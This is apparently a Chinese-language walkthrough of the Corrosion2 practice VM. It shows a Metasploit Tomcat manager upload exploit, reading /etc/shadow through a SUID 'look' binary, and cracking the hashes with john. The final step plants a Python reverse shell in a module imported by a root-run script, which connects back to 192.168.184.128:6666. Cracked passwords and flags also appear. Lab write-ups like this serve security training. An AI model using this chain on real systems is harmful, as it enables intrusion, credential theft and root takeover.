使用改模块 use 3
set HttpPassword melehifokivai set Httpusername manager set rhosts 192.168.43.4 set rport 8080 msf6 exploit(multi/http/tomcat_mgr_upload) > show options run
如下图所示成功反弹,获取shell
shell whoami uid
切换用户 jaye 的 shell 进入 meterpreter shell 使用 python 切换 bash python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /home ls 发现两个用户名
cd /home/randy ls -la 发现一些文件 cat note.txt
打开note.txt查看
嘿,兰迪,我是你的系统管理员,希望你有美好的一天!我只是想让你知道我更改了你主目录的权限。目前还不能删除或添加文件。
第一个flag,打开user.txt查看
cat user.txt ca73a018ae6908a7d0ea5d1c269ba4b6
由于randy目录下面的文件不能修改,一些关键文件也无法查看,切换到其他用户目录看看
su jaye melehifokivai //密码,还是tomcat的密码 成功进入
查看etc/passwd文件
cat /etc/passwd
可以使用ssh登录
ssh @192.168.43.4 yes melehifokivai
id whoami pwn ls -la
发现一些文件,查看files文件夹下面的look文件
cd Files ls -la cat look file look which look
是系统的look命令,look命令可以越权访问
https://gtfobins.github.io/gtfobins/look/),
cat /etc/passwd LFILE=/etc/passwd ./look '' "$LFILE"
将/etc/shadow文件复制下来
注意:这里也可以直接查看flag。 —— —— >>>> ./look '' /root/root.txt
将/etc/passwd文件复制下来
将以上两个文件保存到本地
vim passwd vim shadow unshadow passwd shadow > pssword.txt 爆破 john --wordlist=/usr/share/wordlists/rockyou.txt ./password.txt
破解出第一个账号密码(若干小时.........)
melehifokivai (jaye)
破解出第二个账号密码(若干小时..........)
07051986randy (randy)
第二个flag
第一个账号已经找到相关内容,现在登录第二个账号
su randy 07051986randy 登录成功,进入账号
cd .. ls cd randy ls -la
sudo -l 07051986randy
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
root会执行该文件,并且引用了base64模块
打开查看base64模块
cd /usr/bin/python3.8 ls -la base64.py vi base64.py
插入以下shell 参考以下大佬博客
https://blog.csdn.net/Perpetual_Blue/article/details/124245059?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-0-124245059-blog-122969392.pc_relevant_aa&spm=1001.2101.3001.4242.1&utm_relevant_index=3书签:靶机渗透练习37-Corrosion2_hirak0的博客-CSDN博客
import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.184.128",6666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")
命令行模式下执行: set nobackup set nowritebackup set noswapfile wq
在被攻击机上执行命令:sudo /usr/bin/python3.8 /home/randy/randombase64.py输入密码:07051986randy
执行之后,可以看到 nc 反弹 shell 成功,为 root 权限
网络图片:https://ucc.alicdn.com/images/user-upload-01/img_convert/e949a09c35c899402e11eb34f80fcb19.png
2fdbf8d4f894292361d6c72c8e833a4b
方法二:利用./look获取flag
ssh jaye@192.168.43.4 jaye@192.168.43.4's password: Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64) ...... $ pwd /home/jaye $ cd .. $ ls jaye randy $ cd ~ $ ls -la total 92 drwxr-x--x 18 jaye jaye 4096 Aug 2 23:38 . drwxr-xr-x 4 root root 4096 Sep 17 2021 .. -rw-r--r-- 1 root root 0 Sep 17 2021 .bash_history -rw-r--r-- 1 jaye jaye 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 jaye jaye 3771 Feb 25 2020 .bashrc drwx------ 12 jaye jaye 4096 Sep 17 2021 .cache drwx------ 11 jaye jaye 4096 Sep 17 2021 .config drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Desktop drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Documents drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Downloads drwxr-xr-x 2 root root 4096 Sep 17 2021 Files drwx------ 3 jaye jaye 4096 Sep 17 2021 .gnupg drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 .local drwx------ 5 jaye jaye 4096 Sep 17 2021 .mozilla drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Music -rw-rw-r-- 1 jaye jaye 2929 Aug 2 23:35 passwd drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Pictures -rw-r--r-- 1 jaye jaye 807 Feb 25 2020 .profile drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Public -rw-rw-r-- 1 jaye jaye 1827 Aug 2 23:37 shadow drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 snap drwx------ 2 jaye jaye 4096 Sep 17 2021 .ssh drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Templates -rw-rw-r-- 1 jaye jaye 0 Aug 2 23:38 userpass.txt drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Videos $ cd Files $ ls -la total 24 drwxr-xr-x 2 root root 4096 Sep 17 2021 . drwxr-x--x 18 jaye jaye 4096 Aug 2 23:38 .. ---s--s--x 1 root root 14728 Sep 17 2021 look ./look '' '/root/root.txt'
总结:
前期渗透思路和一般的方式一样,都是主机发现,端口扫描,更具端口查看服务
探测端口下面的目录 80 8080
8080下面发现突破点文件
解压破解获得tomcat账号密码
tomcat登录上传war包反弹失败
使用msf下面的tomcat上传漏洞获取shell
查看文件 发现两个账号
登录randy 发现第一个flag
破解第二个账号密码
登录提权 获取第二个flag
